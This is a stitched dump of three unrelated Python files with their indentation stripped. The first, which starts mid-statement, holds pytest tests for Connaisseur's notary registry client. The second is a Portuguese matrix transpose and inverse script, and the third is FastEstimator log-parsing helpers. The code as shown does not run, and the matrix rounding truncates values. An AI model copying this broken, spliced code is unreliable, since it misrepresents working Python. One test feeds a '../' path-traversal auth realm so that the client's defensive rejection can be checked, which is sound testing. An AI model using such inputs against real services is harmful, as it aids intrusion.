'core.harbor.domain/connaisseur/sample-image:pull"'
)
},
401,
)
elif registry == "empty.io":
return MockResponse({}, status_code=404)
else:
with open(f"tests/data/{image}/{role}.json", "r") as file:
file_content = json.load(file)
return MockResponse(file_content)
monkeypatch.setattr(requests, "get", mock_get_request)
@pytest.fixture
def mock_trust_data(monkeypatch):
def validate_expiry(self):
pass
def trust_init(self, data: dict, role: str):
self.schema_path = "res/targets_schema.json"
self.kind = role
self._validate_schema(data)
self.signed = data["signed"]
self.signatures = data["signatures"]
monkeypatch.setattr(
connaisseur.trust_data.TrustData, "validate_expiry", validate_expiry
)
monkeypatch.setattr(connaisseur.trust_data.TargetsData, "__init__", trust_init)
connaisseur.trust_data.TrustData.schema_path = "res/{}_schema.json"
def trust_data(path: str):
with open(path, "r") as file:
return json.load(file)
@pytest.mark.parametrize(
"host, out", [("host", True), ("", False), ("https://unhealthy.registry", False)]
)
def test_health_check(napi, mock_request, host: str, out: bool):
assert napi.health_check(host) == out
@pytest.mark.parametrize(
"host, out", [("host", True), ("", False), ("https://unhealthy.registry", True)]
)
def test_health_check_acr(acrapi, mock_request, host: str, out: bool):
assert acrapi.health_check(host) == out
@pytest.mark.parametrize("slfsig, out", [("1", True), ("0", False), ("", False)])
def test_is_notary_selfsigned(napi, slfsig: str, out: bool, monkeypatch):
monkeypatch.setenv("SELFSIGNED_NOTARY", slfsig)
assert napi.is_notary_selfsigned() == out
@pytest.mark.parametrize(
"image, role, out",
[
("alice-image:tag", "root", trust_data("tests/data/alice-image/root.json")),
(
"alice-image:tag",
"targets",
trust_data("tests/data/alice-image/targets.json"),
),
(
"alice-image:tag",
"targets/phbelitz",
trust_data("tests/data/alice-image/targets/phbelitz.json"),
),
(
"auth.io/sample-image:tag",
"targets",
trust_data("tests/data/sample-image/targets.json"),
),
],
)
def test_get_trust_data(
napi, mock_request, mock_trust_data, image: str, role: str, out: dict
):
trust_data_ = napi.get_trust_data("host", Image(image), TUFRole(role))
assert trust_data_.signed == out["signed"]
assert trust_data_.signatures == out["signatures"]
def test_get_trust_data_error(napi, mock_request, mock_trust_data):
with pytest.raises(BaseConnaisseurException) as err:
napi.get_trust_data("host", Image("empty.io/image:tag"), TUFRole("targets"))
assert 'no trust data for image "empty.io/image:tag".' in str(err.value)
def test_parse_auth(napi):
header = (
'Bearer realm="https://core.harbor.domain/service/token",'
'service="harbor-notary",scope="repository:core.harbor.domain/'
'connaisseur/sample-image:pull"'
)
url = (
"https://core.harbor.domain/service/token?service=harbor-notary"
"&scope=repository:core.harbor.domain/connaisseur/sample-image:pull"
)
assert napi.parse_auth(header) == url
@pytest.mark.parametrize(
"header, error",
[
(
'Basic realm="https://mordor.de",scope="conquer"',
"unsupported authentication type for getting trust data.",
),
(
'Super realm="https://super.de",service="toll"',
"unsupported authentication type for getting trust data.",
),
(
'Bearer realmm="https://auth.server.com",service="auth"',
"could not find any realm in authentication header.",
),
(
'Bearer realm="http://auth.server.com",service="auth"',
"authentication through insecure channel.",
),
(
'Bearer realm="https://exam.pl/path/../traversal.key",service="no"',
"potential path traversal.",
),
],
)
def test_parse_auth_error(napi, header: str, error: str):
with pytest.raises(BaseConnaisseurException) as err:
napi.parse_auth(header)
assert error in str(err.value)
@pytest.mark.parametrize(
"user, password, out",
[
(None, None, "no.BA.no"),
(None, "password123", "no.BA.no"),
("myname", "password456", "BA.myname.password456a"),
("myname", None, "BA.myname.a"),
],
)
def test_get_auth_token(napi, mock_request, monkeypatch, user, password, out):
if user:
monkeypatch.setenv("NOTARY_USER", user)
if password is not None:
monkeypatch.setenv("NOTARY_PASS", password)
url = "https://auth.server.good/token/very/good"
assert napi.get_auth_token(url) == out
def test_get_auth_token_acr(acrapi, mock_request):
url = "https://myregistry.azurecr.io/auth/oauth2?scope=someId"
assert acrapi.get_auth_token(url) == "d.e.f"
@pytest.mark.parametrize(
"url, error",
[
(
"https://auth.server.bad/token/very/bad/very",
"authentication token has wrong format.",
),
(
"https://auth.server.bad/token/no/token",
"no token in authentication server response.",
),
(
"https://auth.server.bad/token/it/aint/there/token",
"unable to get auth token, likely because of missing trust data.",
),
(
"https://myregistry.azurecr.io/auth/oauth2?scope=someId",
"no token in authentication server response.",
),
],
)
def test_get_auth_token_error(napi, mock_request, url: str, error: str):
with pytest.raises(BaseConnaisseurException) as err:
napi.get_auth_token(url)
assert error in str(err.value)
@pytest.mark.parametrize(
"url, error",
[
(
"https://auth.server.bad/token/very/bad/very",
"no token in authentication server response.",
),
(
"https://auth.server.good/token/very/good",
"no token in authentication server response.",
),
],
)
def test_get_auth_token_error_acr(acrapi, mock_request, url: str, error: str):
with pytest.raises(BaseConnaisseurException) as err:
acrapi.get_auth_token(url)
assert error in str(err.value)
|
nilq/baby-python
|
python
|
def identidade(n):
I = [[0 for x in range(n)] for y in range(n)]
for i in range(0,n):
I[i][i] = 1
return I
def transposta(mA): #transposta
n = len(mA)
mT = identidade(n)
for i in range(n):
for j in range(n):
mT[i][j] = mA[j][i]
print("Matriz Transposta : ")
for x in mT:
print(*x, sep=" ")
return mT
def inversa(A, arred = 0):
n = len(A)
inversa = identidade(n)
indices = list(range(n)) # Auxiliar no loop "for"
#print(indices)
for fd in range(n): # fd serve para focar na diagonal
fdScaler = 1.0 / A[fd][fd]
# 1º: Reduz a matriz A aplicando as operações na inversa
for j in range(n): # j analisa as colunas
A[fd][j] *= fdScaler
inversa[fd][j] *= fdScaler
# 2º: Operando todas as linhas exceto alinha fd
for i in indices[0:fd] + indices[fd+1:]: # Pular a linha fd
crScaler = A[i][fd] # crScaler = Índice para escalonar as linhas atuais
for j in range(n): # cr - crScaler * fdRow
A[i][j] = A[i][j] - crScaler * A[fd][j]
inversa[i][j] = inversa[i][j] - crScaler * inversa[fd][j]
if arred == 1:
for i in range (n):
for j in range(n):
inversa[i][j] = int(inversa[i][j])
print("Matriz Inversa : ")
for x in inversa:
print(*x, sep=" ")
return inversa
M = [[12,3,1],[8,4,3],[1,1,1]]
t = transposta(M)
inv = inversa(M, 1)
|
nilq/baby-python
|
python
|
# Copyright 2019 The FastEstimator Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import os
import re
from fastestimator.summary import Summary
from fastestimator.util.loader import PathLoader
from fastestimator.util.util import strip_suffix
from fastestimator.summary.logs import visualize_logs
def _parse_file(file_path, file_extension):
"""A function which will parse log files into a dictionary of metrics
Args:
file_path (str): The path to a log file
file_extension (str): The extension of the log file
Returns:
An experiment summarizing the given log file
"""
# TODO: need to handle multi-line output like confusion matrix
experiment = Summary(strip_suffix(os.path.split(file_path)[1].strip(), file_extension))
with open(file_path) as file:
for line in file:
mode = None
if line.startswith("FastEstimator-Train"):
mode = "train"
elif line.startswith("FastEstimator-Eval"):
mode = "eval"
if mode is None:
continue
parsed_line = re.findall(r"([^:^;\s]+):[\s]*([-]?[0-9]+[.]?[0-9]*);", line)
step = parsed_line[0]
assert step[0] == "step", \
"Log file (%s) seems to be missing step information, or step is not listed first" % file
for metric in parsed_line[1:]:
experiment.history[mode][metric[0]].update({int(step[1]): float(metric[1])})
return experiment
def parse_log_files(file_paths,
log_extension='.txt',
smooth_factor=0,
save=False,
save_path=None,
ignore_metrics=None,
share_legend=True,
pretty_names=False):
"""A function which will iterate through the given log file paths, parse them to extract metrics, remove any
metrics which are blacklisted, and then pass the necessary information on the graphing function
Args:
file_paths: A list of paths to various log files
log_extension: The extension of the log files
smooth_factor: A non-negative float representing the magnitude of gaussian smoothing to apply (zero for none)
save: Whether to save (true) or display (false) the generated graph
save_path: Where to save the image if save is true. Defaults to dir_path if not provided
ignore_metrics: Any metrics within the log files which will not be visualized
share_legend: Whether to have one legend across all graphs (true) or one legend per graph (false)
pretty_names: Whether to modify the metric names in graph titles (true) or leave them alone (false)
Returns:
None
"""
if file_paths is None or len(file_paths) < 1:
raise AssertionError("must provide at least one log file")
if save and save_path is None:
save_path = file_paths[0]
experiments = []
for file_path in file_paths:
experiments.append(_parse_file(file_path, log_extension))
visualize_logs(experiments,
save_path=save_path,
smooth_factor=smooth_factor,
share_legend=share_legend,
pretty_names=pretty_names,
ignore_metrics=ignore_metrics)
def parse_log_dir(dir_path,
log_extension='.txt',
recursive_search=False,
smooth_factor=1,
save=False,
save_path=None,
ignore_metrics=None,
share_legend=True,
pretty_names=False):
"""A function which will gather all log files within a given folder and pass them along for visualization
Args:
dir_path: The path to a directory containing log files
log_extension: The extension of the log files
recursive_search: Whether to recursively search sub-directories for log files
smooth_factor: A non-negative float representing the magnitude of gaussian smoothing to apply(zero for none)
save: Whether to save (true) or display (false) the generated graph
save_path: Where to save the image if save is true. Defaults to dir_path if not provided
ignore_metrics: Any metrics within the log files which will not be visualized
share_legend: Whether to have one legend across all graphs (true) or one legend per graph (false)
pretty_names: Whether to modify the metric names in graph titles (true) or leave them alone (false)
Returns:
None
"""
loader = PathLoader(dir_path, input_extension=log_extension, recursive_search=recursive_search)
file_paths = [x[0] for x in loader.path_pairs]
parse_log_files(file_paths,
log_extension,
smooth_factor,
save,
save_path,
ignore_metrics,
share_legend,
pretty_names)
|
nilq/baby-python
|
python
|